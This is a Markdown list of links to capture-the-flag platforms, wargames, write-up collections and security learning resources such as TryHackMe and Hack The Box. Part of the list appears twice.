33. [SANS Holiday Hack Challenge](https://www.sans.org/mlp/holiday-hack-challenge/)
34. [CrackMe Challenges](https://crackmes.one/)
### Forums and Communities
35. [Reddit - r/CTF](https://www.reddit.com/r/CTF/)
36. [InfoSec Community Discord](https://discord.gg/infosec)
37. [Hacker News](https://news.ycombinator.com/)
### Beginner-Friendly
38. [PentesterLab](https://pentesterlab.com/)
39. [Bandit Wargame](https://overthewire.org/wargames/bandit/)
40. [Microcorruption](https://microcorruption.com/)
### Advanced Challenges
41. [Real World CTF](https://realworldctf.com/)
42. [Google CTF](https://capturetheflag.withgoogle.com/)
43. [Flare-On Challenge](https://www.flare-on.com/)
44. [Hack.lu CTF](https://2019.hack.lu/index.html)
### Additional GitHub Resources
45. [Awesome CTF](https://github.com/apsdehal/awesome-ctf)
46. [CTF Wiki](https://ctf-wiki.org/)
47. [HackTricks](https://book.hacktricks.xyz/)
48. [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)
49. [SecLists](https://github.com/danielmiessler/SecLists)
### Bonus Links
50. [Practice Labs from Security Blue Team](https://securityblue.team/practice/)
### TryHackMe (THM) Links
1. [Official TryHackMe Website](https://tryhackme.com)
2. [TryHackMe Learning Paths](https://tryhackme.com/paths)
3. [Free Rooms on TryHackMe](https://tryhackme.com/free)
4. [TryHackMe Discord Community](https://discord.gg/tryhackme)
5. [TryHackMe Blog](https://blog.tryhackme.com)
6. [GitHub: Awesome TryHackMe Writeups](https://github.com/0xagun/awesome-tryhackme-writeups)
### Popular CTF Platforms
7. [Hack The Box](https://www.hackthebox.com/)
8. [CTFtime](https://ctftime.org/)
9. [PicoCTF](https://picoctf.org/)
10. [Root Me](https://www.root-me.org/)
11. [OverTheWire Wargames](https://overthewire.org/)
12. [CyberSecLabs](https://cyberseclabs.co.uk/)
13. [THM vs HTB Writeups](https://github.com/Ignitetechnologies)
### CTF Challenges & Resources
14. [Cryptohack](https://cryptohack.org/)
15. [WeChall Challenges](https://www.wechall.net/)
16. [Challenges on CTFlearn](https://ctflearn.com/)
17. [W3Challs](https://w3challs.com/)
18. [Hacker101 CTF](https://ctf.hacker101.com/)
19. [Defend the Web](https://defendtheweb.net/)
20. [RingZer0 Team Online CTF](https://ringzer0ctf.com/)
### Tools for Practice
21. [VulnHub](https://www.vulnhub.com/)
22. [TryHackMe GitHub Repository](https://github.com/topics/tryhackme)
23. [CTFd (Create Your Own CTF)](https://ctfd.io/)
24. [CrackStation](https://crackstation.net/)
### Writeups and Blogs
25. [CTF Writeups GitHub](https://github.com/ctfs/write-ups-2019)
26. [TryHackMe Subreddit](https://www.reddit.com/r/tryhackme/)
27. [Hack The Box Subreddit](https://www.reddit.com/r/hackthebox/)
28. [Infosec Writeups on Medium](https://medium.com/bugbountywriteup)
### Learning Resources
29. [Hack This Site](https://www.hackthissite.org/)
30. [Cyber Security Challenge](https://cybersecuritychallenge.org.uk/)
31. [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)
32. [CTF Field Guide (Trail of Bits)](https://trailofbits.github.io/ctf/)
33. [SANS Holiday Hack Challenge](https://www.sans.org/mlp/holiday-hack-challenge/)
34. [CrackMe Challenges](https://crackmes.one/)
### Forums and Communities
35. [Reddit - r/CTF](https://www.reddit.com/r/CTF/)
36. [InfoSec Community Discord](https://discord.gg/infosec)
37. [Hacker News](https://news.ycombinator.com/)
### Beginner-Friendly
38. [PentesterLab](https://pentesterlab.com/)
39. [Bandit Wargame](https://overthewire.org/wargames/bandit/)
40. [Microcorruption](https://microcorruption.com/)
### Advanced Challenges
41. [Real World CTF](https://realworldctf.com/)
42. [Google CTF](https://capturetheflag.withgoogle.com/)
43. [Flare-On Challenge](https://www.flare-on.com/)
44. [Hack.lu CTF](https://2019.hack.lu/index.html)
### Additional GitHub Resources
45. [Awesome CTF](https://github.com/apsdehal/awesome-ctf)
46. [CTF Wiki](https://ctf-wiki.org/)
47. [HackTricks](https://book.hacktricks.xyz/)
48. [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)
49. [SecLists](https://github.com/danielmiessler/SecLists)
### Bonus Links
50. [Practice Labs from Security Blue Team](https://securityblue.team/practice/)
TryHackMe
TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!